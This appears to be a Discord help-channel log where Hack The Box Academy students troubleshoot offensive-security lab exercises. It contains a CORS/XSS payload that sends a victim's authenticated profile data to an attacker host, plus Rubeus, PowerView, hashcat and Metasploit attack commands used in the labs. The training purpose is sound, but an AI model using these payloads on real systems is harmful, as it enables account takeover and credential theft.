#modules
Hello All can anyone help me for the last 2 questions in the below module : https://academy.hackthebox.com/module/112/section/1073
I am working on the following exercise 'Parameter Logic Bugs -- > Code Review - Validation Logic Disparity':
Target(s): 94.237.60.154:51408
Try to locate both of the above functions, and then try to understand their main functionality, and see whether they are missing any validations that were performed on the front-end "thus leading to a logic disparity". Which of the two is more likely to be vulnerable? Use the function name as your answer.
I cannot select a date and view it source code, find whether they are missing any validations? Can someone help me with this?
@rustic sage don't spoil anything from AEN; my only hint is making sure everything is capitalized appropriately
c# is killing me help
it is only available for .net 4.0.0 which cannot be installed on new machines
Is someone available for my question?
ask the question
See #modules message
sorry mate, i haven't tackled that module yet
Which Module is this on?
The date is in the screenshots. It's in the past
Check the year
advanced deserialization
You may have to pull the references manually in the project tab (add references)
Haven't had any problems through the module
were you able to install .net 4.7.2
Just a bit of digging through C#, which is not my strong suit
Are you using your own VM or the Module's?
my own pc
Try the one from the Module
even that one has .net 6.0 only
https://www.reddit.com/r/VisualStudio/comments/utgvg6/cannot_use_net_472_with_visual_studio_2022/ i think i managed to install it now
I haven't installed anything with the Module's VM actually. Just had to reference some other assemblies manually
i downloaded it locally, i thought it would be a good learning experience to setup a exploit dev environment
How does one reset progress on the academy modules?
you cant
Delete your account
It's a way
Meaning I'll lose my cubes, no thank you.
Jeez was this password "&aue%C)}6g-d{w" really necessary for a module that we get the RDP credentials anyway...
Stuck at Oracle TNS.
So i connected to the database using user credentials, enumerated the server and I was supposed to query the server for name and password, where the name is 'DBSNMP'.
I have been querying tables left n right but no matches.
I don't have a way to escalate privileges and it seems unlikely for this module to do that.
Kindly help me as to what do i do to retrieve these records.
PS tried SQL queries with wildcards, didn't help
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Which database instance are you connecting to?
Try doing it again with odat tool
Is there a different instance i should look for ?
yes
Okay lemme give that a shot
Thanks, although I have already finished the question hahah
Is there anyone that can assist me on the takedown Sherlock? The last question on the TLSH it won't accept the answer I found in VT
Feel free to dm me. I would greatly appreciate the help from someone
Yes, I found another XEXDB instance but the answer was inside XE, sorry!
Haha nvm.
M just glad I got it.
Thanks for the help as always
I did double check and it is possible to see that hint you added now
Wait.... the people who MADE these modules are on this SERVER ??
Yes, I think there are many people who have already completed the footprint module so I think most of them have their notes from all the labs so they can help you as well.
ugh enum4linux y u take so long
Can somebody from HTB check on the server for the Info Gathering - Web Edition Skills Assessment module? It's not working even after multiple resets. Can't even ping the server IP (and yes, I'm connected to the HTB vpn)
Saw a thread in here from 7/31 where @floral talon and another person were having the same issue despite doing everything right. I'm having the same issue unfortunately.
I added a line in my /etc/hosts file:
94.237.59.180 inlanefreight.htb
Yet I can't ping the IP, or open the URL in a browser with http://inlanefreight.htb:{PORT}
The other day I was able to brute force the subdomain for this module, but today I can't repeat what I did successfully.
My vpn stopped working randomly last week and no matter how many times I download a new ovpn file and switch vpn servers, it hasn't started back working. Pwnbox saves the day
you get a port with the IP. Point your browser (and tools) to IP:PORT and it should work. Not sure why you can't ping it, I can ping the address I'm given
Yea I tried that too but no dice. I kept getting the same IP address each time I reset but with a different port and same results. Oddly enough it was the same exact IP I used 3 days ago for this module.
Just now I tried resetting over and over until I got a different IP on the same subnet and it's working now
advanced deserialization skills assessment is more like a reversing challenge lol
In the end is figuring which gadget chain you should invoke to gain command execution
i just got a random payload from ysoserial
Anyone had issues with ADCS module, Certifried section, I cant modify the dNSHostName attribute of newly created machine account using bloodyAD or powerview.py
but it works when using certipy:
Do we have a channel for suggestions/feedback?
use /feedback
hey, This is the active directory introduction module, chapter AD Objects
im not sure of the correct regex to enter the answer, all variations of OU are not accepted
i got it
the multiple form of the word is needed
Hey
Can someone help me with attacking enterprise module lateral movement
I have managed to add ilfserveradmin to Administrators group using mimikatz
Now i need to read a flag in users administrator desktop but i cant seem to get into users administrator folder still now
Log out and back in
Also finish the module blind
Don't read or do the questions
Until after you get DC
has anyone done the fuzzing module?
is it good?
i am going to try it next to talk about with some of my friends who like that stuff but dont write/do htb modules.
oh i thought it used harnesses? and afl
Oh
was binary? i gotta look it was 500 cubes
Hello im facing an issue on ICMP Tunneling with SOCKS.
Here is the error message I get when running ptunnel-ng on the victim host :
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.36' not found (required by ./ptunnel-ng)
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./ptunnel-ng)
I tried to add the packages but didn't work...
You need to statically compile it before sending it over
by doing autogen.sh you mean ?
Great it worked thank you !
Is it really viable the double pivots part using SocksOverRDP ?
It was lagging a lot ! I took 10 minutes just to read the flag.txt...
I don't even imagine if you have to do a new enumeration, run some tools and so on
Hi, I did the same thing but that didn't work. I changed VPNs and downloaded a new config file, but 172.16.8.0 just hangs, and then times out.
I got local admin on both 15 and 25 . On 25 i run mimikatz and found fileshare and Isharefiles2023! Creds. Now im stuck at this point i m unable to use this anywhere.... But on DC there is a shared folder with read and write permission on it
Hello
no
Bloodhound Module
Final SA Question: Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78).
I must be missing something easy. Total number of users is:
||15 for inlanefreight.htb
13 for AZusers
So 28 total||
I then do the math based on users with a path to Global admin ||4 || and no dice.
Can I get a sanity check please? Thanks!
Edit: For anyone that finds this in the future, after pulling their hair out like I did:
- The scope they are looking for is the total number of ||AZusers|| which can be found by looking at the ||database info|| tab in bloodhound.
- The answer they are expecting isn't rounded up.
Example: 14.258 is rounded up to 14.26 in excel. In this case, the answer they are expecting isn't rounded i.e. (14.25)
Hope this helps!
Use ligolo to do port forwarding and then ping it proxychains is a bummer most times
Ligolo isn't working for me either
Did anyone find the windows VM too slow in the section Thick Client Applications of the Attacking Common Applications module? I've been stuck on it for weeks and can't move past it. If it's allowed can someone DM me the answer so I can finish the module?
Can't give you the answer, but we can show the proper steps to get to the answer
Well.. don't just show the steps.. try to guide them to discover the steps
If you wanna help someone, showing them the path with a map just gets them to the end. Guiding them via encouraging them ask the right questions themselves in order to come to the answers, that's the ticket.
Anyone have time for a video chat that completed Attacking Enterprise Networks? Especially Exploitation & Privilege Escalation? I've hit a wall, and I cannot for the life of me figure this one out.
have you checked the module? it takes you through step-by-step on how to do it
Hey, can someone help me real quick? I just downloaded Kali linux and the codes on the terminal dont get highlighted when I type them its just plain white
How do I fix that?
did you install the gui version? sounds like maybe you used bash instead of zsh
Hey guys not sure if this is the right channel for this, but ive been working on this for two days now and i cant find the answer to this question, any advice? This is the AD Enum and Attack path in the ACL Enum Module
Question:
What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)
Ive found that ||The user forend has the AddSelf and Generic Write|| rights over the GPO group, but putting it in the format ||Add-Self and Generic-Write|| doesnt give the answer, im pretty confused.
Anyone having problem spawning target ?
What did you use to get this information?
Couple ways, inside the module they recommend turning the username into security principle and then using that in combination with PowerView to grab what ACLs we may have (Commands below), Then I grabbed all the info via sharphound and plopped it into bloodhound and took a look since that was another method they recommended to see what ACLs we may have.
Commands
||PS C:\Tools> $forendid = Convert-NameToSid forend ||
||PS C:\Tools> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $forendid} -Verbose ||
Hey having issues with Getting Started module I'm connecting to the VPN but when I ping the target I get nothing...
I remember having issues too and the only thing that fixed it on my end was switching to an EU VPN.
Interesting
Run man netcat and look at the command format
You can DM if you want.
Still nothing
Is the IP you're trying to ping 83.136.252.99? If so, this isn't a VPN issue as that is a public IP and doesn't require a VPN connection to connect to.
Ok..
Remove :39160
That is the port number
Ping is attempting to resolve what you provided as a domain name, as it does not fit the format of an IP address
and it works now lol
Whenever you see an IP with a : in, you're getting both the IP and the port number
ah whoops lol
Hello guys. Can you please confirm if this is a lie:
To extract sensitive information like cookies, local storage, or session storage data from http://10.129.28.25/phishing/, you need JavaScript executed within the context of that origin.
This means that you CANNOT send a malicious payload to the target which goes to the site that you want their cookies from and then send their cookies to your server?
Is this true ?
it can be
i think it depends on the CORS policy, but i could be very wrong i'm weak with web stuff
yeah it's a heavy it depends
Oh Okay. I am noticing much more as I am doing a deep dive into the vulnerabilities and attacks that Chat GPT does not know everything
ChatGPT isn't a knowledge repository
Today alone it didn't know 2-3 things and it gave me code that was less efficient that a module
it can be used to help explain something
Module: Windows Attack and Defense
Section: Print Spooler & NTLM Relaying
Issue: When I setup the ntlmrelayx on 1 terminal and setting up another terminal for dementor, I'm running into issues on terminal 1 with a bunch of errors once I've executed dementor. Anyone else run into that issue?
Rem, have you tried not having skill issues? (i haven't done that one)
Well, it depends.. "within the context of that origin" is the key term here.
There are other ways of sending requests to a host bypassing CORS and CSP, but that statement above suggests you would have a way to execute javascript within the context of the origin.
So I have another problem... it involves gobuster
If this is in a module, perhaps re-read the previous sections of the module. You may have missed something
Your machine seems to have issues connecting to the web. Can you open a browser and reach Google or some other website?
Which is weird cause I've used gobuster before
oh actually you got a 404 so it's connected
yee
kali has gobuster preinstalled i thought? or maybe only mine cuz i downloaded the 'everything' version..
you can get it from here https://github.com/OJ/gobuster/releases/tag/v3.6.0
Ik I'm probs dumb how do I download it from the zip (I've done it before from my laptop when I had arch but it's been a bit)
you download it and unzip it
ahh
Thats weird cause u can send victims to different parts of the website for example to change their user info and then get info response through the page that they get -- but meanwhile u cant get the response cookies and stuff ?
Maybe u can explain this
ADCS Attacks > Skills Assessment
I am stuck at the last question. I have got the jimmy user and found the vulnerability but I can not exploit it. Can anyone give a nudge. (DM is fine)
Again, which module / section? I can't provide direct advice I'm afraid, but feels like you may have missed something in the sections leading up to this.
If the exploit doesn't work, perhaps that's not the vulnerability..
did you even check the section
nah you don't know
I did, but if you found the correct vulnerablity you should be able to exploit it, since you said you can't, you probably didn't find the right one. it's tricky.
you aren't going to run an .exe file in linux, that's for windows. you need to download the linux binary
then chmod +x it
gobuster wasn't preinstalled in kali for you? did you get some bare bones version? i always get the full version and it comes preinstalled for me, but i would imagine gobuster comes with the smaller versions
idk what happened to it
I'm just gonna make another vm fresh
wow, didnt get part with script
can i dm for that?
ok got gobuster running and also for some reason it just won't install on the other vm but will with this one HahAHa
ok now how do I get wordlists?!
comes with kali to.. locate -i rockyou or seclists, or whatever you're trying to find. otherwise google seclists/rockyou/whatever wordlist
Guess my version doesn't have seclists I'm just gonna download it idk why Kali hates me today
apt install seclists
already on it lol
I mean I got it off the official website via an image file
some reason it is now working. nvm
and now I can't get the website when I type it in...
well, the pwnbox is always available
I'll try it
in the browser it can't reach the website...
it probably despawned or wrong port
welp I figured it out
The /47/ seems a bit odd imo
that was the issue... I read it wrong
It happens, you're all set now
Sorry if I'm a goober
You're not and no need to be sorry
I have a query regarding Intro to Network Traffic Analysis module Tcpdump Fundamentals section question # 4.
Why is sudo even required when we are just reading from a file? It does not feel intuitive to me, had to lookup the answer after several failed attempt.
Hi guys, I have a question, which system is the best? Windows 11 pro or kali linux? What do you think? I bought a new laptop and I am undecided which one I should prefer.
win 11 with a vm running kali
Win 11 with wsl 2 kali
So is gobuster supposed to go slow with dns search?
Do you guys recommend using msf bounce shell or just nc bounce shell?
I (for the life of me) CANNOT get ReconSpider to work on the skills assessment of the Information Gathering - Web Edition module. Losing my mind
wdym "can't get it to work"
like that's a super vague thing
Yea go ahead.
oops that screenshot technically spoils
hi all, I need some clarification. The module is Password Attacks, I'm in the Windows Pass the Ticket section (https://academy.hackthebox.com/module/147/section/1639). The Mimikatz command for "Pass the Key or Overpass the Hash" is exactly the same as the one demonstrated in the previous section for a simple "Pass the Hash". I'm trying to understand what the difference is, is it the context? Kerberos vs "simple" NTLM in each case respectively?
PS: reading ahead and checking the recommended reading of https://github.com/GhostPack/Rubeus#example-over-pass-the-hash makes me more confused - it seems like the method presented for Mimikatz PtH (sekurlsa::pth) is actually an Overpass...
ok, if I understand correctly,
- mimikatz' sekurlsa::pth is effectively an Overpass;
- in the process, it "injects" the NTLM hash into your session;
- for NTLM-based authentication scenarios, this will be sufficient, and we've effectively performed PtH;
- for kerberos, it will then use the NTLM hash to get a ticket and Overpass the Hash.
please let me know if I got any of that wrong, or even just mildly incorrect
what's the difference between parrot security & parrot htb edition (?)
just the HTB theme on the latter (cosmetics)
Does anyone else has his support box gone?
what'll be the benefits?
no other difference, are you sure?
Wrong channel
Yes
What is the right channel?
#1024429874246590575 ; also id turn off any adblockers
yea it solved the problem.. it just always it was fine so far. tnx.
xrdp, remmina are not working while trying to rdp into a windows session from my virtualbox even when using openvpn while it flawlessly works in pwn instance but it gets super slow and annoying in pwn instance, is there any alternative ???
Hi guys, I'm currently stuck on Suricata Rule Development Part 2 (Encrypted Traffic) | Working with IDS/IPS, on this question: "There is a file named trickbot.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to a certain variation of the Trickbot malware. Enter the precise string that should be specified in the content keyword of the rule with sid 100299 within the local.rules file so that an alert is triggered as your answer." Any help would be great .
Hi everyone, I need some help with HackTheBox. I am trying to do the linux fundamentals module and now i am at the system information part, where I need to ssh to a VM. I have a virtual machine of Ubuntu where I am trying it, but it just says: ssh: connect to host 10.129.174.64 port 22: Connection refused
I'm having issues in connecting with Openvpn of meow machine in htb. It's just showing 'Creating Instance' & then doesn't show up anything
Maybe this will help? First check openssh-server installed in that system.
check the status of ssh service, make ssh service start.
sudo service ssh status
sudo service ssh start
Check whether port 22 in that system is blocked by iptables. Just allow port in iptables and then check.
sudo iptables -A INPUT -p tcp --dport ssh -j ACCEPT
Else change port number of ssh from 22 to 2222 by editing
vi /etc/ssh/sshd_config
/etc/init.d/ssh restart.
#starting-point : read and follow #welcome
In the target system or in my own system
Yours
Ngl he gave you a lot of extra legwork
Are you connected to the vpn?
Hey all, I'm on the Getting Started module - Knowledge Check section. I've been able to get my foothold both manually and via metasploit. I've also rooted the box using sudo -l - GTFObins method. I'm trying to find the second privilege escalation method.
What I've tried:
I've run linpeas and linenum and nothing is screaming at me.
Attempted to view bash history of the user. Permission Denied.
Attempted to view successful sudo of user. Permission denied.
Attempted sudo exploit against a known vulnerable version. Says it's not vulnerable.
I've run dpkg -l, not positive how to approach pinpointing vulnerable software. If it is here let me know how I can work through finding it.
Also tried to see if I could loot the id_rsa key with no luck.
Anyone have any hints?
still in the Windows Pass the Ticket section of Password Attacks (https://academy.hackthebox.com/module/147/section/1639). I've answered the last question with Mimikatz, but Rubeus is failing to ptt:
C:\tools>Rubeus.exe asktgt /user:john /domain:inlanefreight.htb /aes256:<prettysureit'stherighthash-butI'vetriedthemallIthink> /ptt
[*] Action: Ask TGT
[*] Using aes256_cts_hmac_sha1 hash: <thehash>
[*] Building AS-REQ (w/ preauth) for: 'inlanefreight.htb\john'
[*] Using domain controller: 172.16.1.10:88
[X] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED:
C:\tools>
Any clue?
I'm still googling it but not having much luck, will try a reset if you can't think of anything
Attacking common applications
Coldfusion enum
I nmaped port 5500 and submitted the protocol under the service column but it seems wrong
Any clue? Some help please... have been trying to enumerate really really hard
Make sure there's no spaces etc
@faint geode could i dm in regards to this?
Sure, but I'm at work so will be slow to respond
using the .kirbi file works, but the above still doesn't, also after a reset. Would like to understand why before moving on, any help ?
Hi
I have a same problem.
I'm connected to vpn on my virtual machine and when I want to connect to ssh I'm getting same error port 22: Connection refused
I followed all of your instructions but still same error.
One thing even after changing ssh port to 2222 it still saying port 22: Connection refused
are you using a password or key to log in ? Also is your VPN up ?
can you provide the full command you are using
I believe if you use -p it will use the right port
I'm currently connected to vpn
for ssh im using same command as in the guide which is "ssh kali@IP of target machine"
Just tried -p 2222 and got error "port 2222: connection refused"
Try resetting the target
└─$ sudo service ssh status
● ssh.service - OpenBSD Secure Shell server
     Loaded: loaded (/usr/lib/systemd/system/ssh.service; disabled; preset: disabled)
     Active: active (running) since Tue 2024-11-12 13:23:02 GMT; 35min ago
 Invocation: a509202877fc4d96961d9391157df943
       Docs: man:sshd(8)
             man:sshd_config(5)
    Process: 8028 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
   Main PID: 8032 (sshd)
      Tasks: 1 (limit: 2203)
     Memory: 316K (peak: 1.7M swap: 1.1M swap peak: 1.1M)
        CPU: 14ms
     CGroup: /system.slice/ssh.service
             └─8032 "sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups"
Nov 12 13:23:02 vbox systemd[1]: Starting ssh.service - OpenBSD Secure Shell server...
Nov 12 13:23:02 vbox sshd[8032]: Server listening on 0.0.0.0 port 2222.
Nov 12 13:23:02 vbox systemd[1]: Started ssh.service - OpenBSD Secure Shell server.
Nov 12 13:23:02 vbox sshd[8032]: Server listening on :: port 2222.
┌──(matias㉿vbox)-[~/Downloads]
└─$ ssh -p 2222 kali@10.129.239.128
ssh: connect to host 10.129.239.128 port 2222: Connection refused
can you ping the target ?
yes ping is working on the target IP
its the same on both virtual machines - kali and parrot linux have same error
ssh -p 22 kali@10.129.239.128 ?
Also i don't think kali is a user on the target
Htb-student usually
your ssh server is listening on port 2222 which is unusual but whatever, it should not be a problem when you try to reach another host
yes i never heard about a kali username inside HTB
Im following guide from this module https://academy.hackthebox.com/module/176/section/1754
and the command used is ssh kali@IP
hum i don't think it's a lab ... that maybe just an example
bump, any clue ?
the fact you are able to ping the 'target' is maybe just a coincidence ?
wrong channel buddy try contacting the official support
can you give me the channel?
no channel, just contact the support (on the academy website)
I don't know i'm getting really confused now. They don't specify other user name for ssh connection apart from (kali/kali)
if you currently are on the exact section you sent, then there is no practice to do maybe retry after spawning the target in skills assessment ?
this page is only for the instructions and im trying to do questions from next page (https://academy.hackthebox.com/module/176/section/1778)
Ah yeah I heard that module uses a kali box
And that it's a PITA
I have no problem doing the remote desktop for windows machine but ssh to kali is like I have shown
I will try using pwnbox but it was always very laggy for me
Same thing on Pwnbox
Hi guys, can anyone help me with this question in "Tcpdump fundamentals" https://academy.hackthebox.com/module/81/section/774 please? In the 4th question one shall name the command for printing the packets from a file in hex and ascii. AFAIK and the man pages, with the given file the solution should be "tcpdump -Xr /tmp/capture.pcap", but this answer is rejected, regardless whether or not providing "tcpdump" as "/usr/bin/tcpdump" or omitting it completely, regardless how to order the switches. Which is the requested answer?
ok, moved on but then figured it out while going through my notes. I was using a key from sekurlsa::tickets, when I should use the output of sekurlsa::ekeys
Maybe add sudo?
Hi everyone,
I'm feeling a bit stuck and disheartened trying to figure out the expected format for the first question in the "Skills Assessment" of the "Stack-Based Buffer Overflows on Linux x86" module.
The question asks: "Determine the file type of 'leave_msg' binary and submit it as the answer."
I've used both the file shell command and the info file command in GDB to gather information. However, the exact and complete output of the file command does not fit in the answer field. I've tried several variations of what I believe to be the important bits of information (e.g., Linux ELF 32-bit i386), but none have been accepted.
Could anyone clarify:
- Is there a specific format expected for the answer?
- Do I need any additional tools or steps beyond file and info file to determine the file type?
I'd really appreciate any guidance or suggestions! Thanks in advance.
I also just checked if I could write my key to the authorized_keys folders. Permission denied.
Can someone help me with the CORS Misconfiguration exercise in the Advanced XSS and CSRF Exploitation Module?
I have found the vulnerability that it is reflecting the Origin but I can't seem to find a way to exploit it.
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://vulnerablesite.htb/profile.php', true);
xhr.withCredentials = true;
xhr.onload = () => {
location = 'https://exfiltrate.htb:42219/log?data=' + btoa(xhr.response);
};
xhr.send();
</script>
it's part of the Windows Attacks & Defense module
Remove the port
Take another look at the section. Particularly the end of the section. Additionally, it is generally good practice to test the payload out yourself before submitting it to the victim. If you try to get your payload to work, your browser will tell you why it isn't working. You don't have to remove the port from the payload, if you get a payload to work on your own session, you can submit it as is and it'll work on the victim as well
Hi,
I am new around here and I try to finish the last bash script from https://academy.hackthebox.com/module/21/section/128
but I can't validate the answer: 25223. Is wrong?
#!/bin/bash
# Decrypt function
function decrypt {
MzSaas7k=$(echo $hash | sed 's/988sn1/83unasa/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/4d298d/9999/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/3i8dqos82/873h4d/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/4n9Ls/20X/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/912oijs01/i7gg/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/k32jx0aa/n391s/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/nI72n/YzF1/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/82ns71n/2d49/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/JGcms1a/zIm12/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/MS9/4SIs/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/Ymxj00Ims/Uso18/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/sSi8Lm/Mit/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/9su2n/43n92ka/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/ggf3iunds/dn3i8/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/uBz/TT0K/g')
flag=$(echo $MzSaas7k | base64 -d | openssl enc -aes-128-cbc -a -d -salt -pass pass:$salt)
}
var="9M"
salt=""
hash="VTJGc2RHVmtYMTl2ZnYyNTdUeERVRnBtQWVGNmFWWVUySG1wTXNmRi9rQT0K"
# Base64 Encoding Loop
for i in {1..28}
do
var=$(echo -n "$var" | base64)
done
# Assign salt as the length of the 28th hash
salt=${#var}
echo $salt
# Check if $salt is not empty and run decrypt
if [[ ! -z "$salt" ]]
then
decrypt
echo $flag
else
exit 1
fi
Thanks for the help guys, I'll have another look
Is the idea to get a session cookie or is there away to make it work as soon as the victim clicks
a
Linux Privilege escalation, Kernel Exploits. When I try to run any of the exploits I find I have :
bash: ./exploit.sh: /bin/sh^M: bad interpreter: No such file or directory
I am not sure what's the problem, do I need to compile .sh file like .c? Or just chmod +x is enough?
hi guys on the password attack module for "Attacking LSASS", how do we transfer the lsass.dmp file to our own machine?
it told us in the previous module (attacking SAM) but it didnt make sense to me for how we could do it for lsass because that was for SAM
Hey im running inveigh to capture hashes in enterprise module lateral movement and its been some time i havent got any hash anyone knows anything
exactly the same method, doesn't matter what kind of files you're transferring
?mm
That has you using RDP to access the target, so the easiest way is to just use /drive with your xfreerdp command. Just drag and drop or copy/paste, etc.
for the shadow file section under the linux chapter of password attacks module, I'm having trouble with the last step.
I am trying to unshadow the shadow file. I tried doing it via ssh on target machine it wouldn't work because I didn't have permission to install john the ripper. I then FTP downloaded the unshadowed hashes. hashcat isn't working on the unshadowed hashes tho. Here's my latest terminal output on the pwnbox after using FTP get request to download unshadowed hashes from the target successfully:
┌─[us-academy-1]─[10.10.15.20]─[htb-ac-605555@htb-ogdmpk3m8h]─[/usr/share]
└──╼ [★]$ hashcat -m 1800 -a 0 /tmp/unshadowed.hashes /usr/share/wordlists/rockyou.txt -o /tmp/unshadowed.cracked
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD EPYC 7543 32-Core Processor, skipped
OpenCL API (OpenCL 2.1 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: AMD EPYC 7543 32-Core Processor, 3919/7902 MB (987 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashfile '/tmp/unshadowed.hashes' on line 1 (Please ask your administrator.): Separator unmatched
No hashes loaded.
Started: Tue Nov 12 15:00:23 2024
Stopped: Tue Nov 12 15:00:23 2024
what's with that part about "Please ask your administrator?"
can someone hint me in the right direction here?
also what's with no hashes loaded
RDP, SMB, base64
I'd check the content of that file, my guess is it's not what you expect
Did you read the File Transfers module? Generally you are just transferring a file; it doesn't really matter if it is SAM or lsass.
I did; it gave a "Please ask your administrator" error.
That module was nice!
wait, that's the contents of the file?
then where are the hashes?
Yeah, and the skills I learned from it were very useful.
my guess is whatever you used to generate unshadowed.hashes failed, giving that as output. Just transfer both /etc/passwd and /etc/shadow to your machine, and unshadow there
It was
There are times when I can't get a connection from the host to a server I control; I always go to converting stuff to b64, then reverting it back.
I tried, but I don't have permission to transfer to my machine,
unless I transfer to the tmp folder, but then I look and the files aren't there.
Slow down a bit. You can SSH into the machine, and you can read the files, correct?
that's always an option, yes. But you can also scp
(among many other options, see the File Transfers module, but that's the most obvious one)
OK, now hashcat is cracking the password, but is it really gonna take seven hours?
exploit/linux/http/apache_solr_backup_restore
exploit/multi/misc/apache_activemq_rce_cve_2023_46604
I'm gonna have the Pwnbox running for a while.
Estimated time is just to run through the whole list.
It generally takes way less time.
OK, thanks.
Also, Pwnbox lifetime can't be extended past 6 hours.
OK, yeah, makes sense; it would be kind of pointless if it took that long.
But I think I will take a break then while it's cracking this.
I will need to get some food for sure.
Am I on the right track if I got hashcat working at least?
Like, am I doing the right thing?
It takes ~30 at most in many situations
SQL Injection module. Connect to the database using the MySQL client from the command line. Use the 'show databases;' command to list databases in the DBMS. What is the name of the first database?
┌──(kali㉿kali)-[~]
└─$ mysql -u root -h 94.237.50.65 -P 39892 -ppassword
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
In htb
Skipping ssl might work with --skip-ssl flag.
Thanks!
OK, so it's 8% of the way through and hashcat hasn't found it yet.
Should I give it 20 more minutes?
Is the guess queue the queue that determines if all passwords have been cracked? I don't mean to ask something stupid.
It also says recovered 0/4.
0/4 means of the 4 hashes, none are cracked
Then perhaps, wrong list
ok
Yeah, I will try again later.
Maybe the list in the resources is more practical.
Will try that one soon.
Wait, hold on.
I'm trying the list in the resources to see if it will work better.
Nope, went through the whole list, didn't work.
What is the right wordlist?
Hold on.
I think what I have to do is mutate the wordlist in the resources.
How do I do that?
OK, I think I am gonna solve it.
I mutated the password list, so now I think it's a matter of waiting.
I think I actually am gonna have mostly solved this on my own.
Is it just me or does x64dbg always take FOREVER to open? Because now that I'm onto the Thick Client section of Attacking Common Applications, if I double click the x64dbg icon on the Remote Desktop, nothing happens for like a minute and a half.
solved
I actually finished it on my own. I feel really good about myself.
gonna try doing the next section on my own
Adding to this that the hints in the module text mention the fact that one is supposed to look for memory of type "MAP" with size 0x3000, which is nowhere to be found anywhere in the memory map. Why is this? ATTN: @gray yacht
Am I supposed to look in ntdll.dll for this runas knockoff? Because the actual memory layout looks nothing like the module screenshots either.
Did you set the breakpoint properly
If you mean "check Exit Breakpoint and uncheck everything else" then yes.
Why therefore is the layout of the file so different from the module?
The exit breakpoint is taking me to ntdll.dll. Why?
@compact matrix you don't need the <>
Just realised :/
Ah yes, it worked without the spaces.
That's gonna take some time.
I don't think I'm doing this right.
You're getting errors though.
DM me the command with the wordlists.
Yeah, just use the ones you found already.
Hey guys, I'm in Attacking Enterprise Networks - Exploitation & Privilege Escalation. Has anyone experienced the web page in the exercise continuously timing out? I logged in with the Admin credentials, and as I was navigating through the exercise, the web page timed out on me three times.
Did anyone else go through this? How did you fix it? I don't want to keep starting over and over.
Hello can anyone familiar with JWT tokens please come to the VC?
Nvm I figured it out
Never mind, realized that I missed a step
Hi there, I am in the Broken Authentication module. In that module, in Brute-Forcing Password Reset Tokens, how can I take over another user's account, which is the last question?
Hello, anyone have any tips on how to RDP? I keep getting a login failure and I am using this command: xfreerdp /v:<target ip> /u:htb-student
add a password? /p:<password>
having trouble with this question as well if anyone has any advice: Section: Windows Privilege Escalation > User Account Control
Q: Follow the steps in this section to obtain a reverse shell connection with normal user privileges and another which bypasses UAC. Submit the contents of flag.txt on the sarah user's Desktop when finished.
What are you struggling with?
Not understanding how to perform an RDP. Am I missing the /p:<password> in the command?
Try to do it with Remmina
Hey, there is an error in the "Intro to Binary Fuzzing" module in the LibFuzzer section. It's right after the big screenshot at the top, starting at "This function (LLVMFuzzerTestOneInput)" and continuing for a few paragraphs. This info appears to be presented earlier than intended, as the code box for that function is way lower on the page.
MODULE: Skills Assessment, SQL Fundamentals lab
I have got a web shell through MySQL on the target, but I do not know how to get the flag, which is at /root.
I have checked the NICs, but they are all LAN IPs.
Where the hell is the flag in "whitebox attacks advanced exploitation"?
Can anyone look at the machine in the Supply Chain module (https://academy.hackthebox.com/module/243/section/2681)? I am not able to RDP into it.
Have tried xfreerdp and Remmina.
Authenticate doesn't necessarily mean RDP.
Thanks for the subtle hint. I am revisiting this module after a long time, my bad.
Probably being dumb, but I'm having issues with ThreatCheck.exe in the Intro to Windows Evasion module: every time I build it and run it against any sample I get the exact same result. Anyone else faced a similar issue?
Hello guys! What is the answer for the first question of the module "Attacking Web Applications with Ffuf", section "Skills Assessment - Web Fuzzing"? I performed vhost fuzzing and got a couple of hits, but I don't know in which order I should put them as the answer.
Hi bro, I'm having the same challenge. How do I decrypt the cookie into plaintext?
The answer format should be like this (only the subdomain name as written in the question): subdomain1 subdomain2 subdomain3
Linux Privilege Escalation
Shared Libraries
Escalate privileges using LD_PRELOAD technique. Submit the contents of the flag.txt file in the /root/ld_preload directory.
When I was reading, in the reference they showed how to escalate privileges using sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart; however, when I check which commands I can run as sudo, I get:
User htb-student may run the following commands on NIX02:
(root) NOPASSWD: /usr/bin/openssl
I know how to escalate my privileges using ssl, but that is not really related to LD_PRELOAD. I need help figuring out how to start.
Yeah, thanks, got them finally. I separated them by commas and it helped.
Seems like they've updated the answer format then.
Hey guys, can anyone help me solve the Sea machine? I'm stuck on the netcat command; I'm unable to receive anything. If you could please help me.
DM me bro
Is anyone there to help me through the Sea machine?
If you referred this to me, then I don't have access to it :9
why it can't connect?
try with sudo
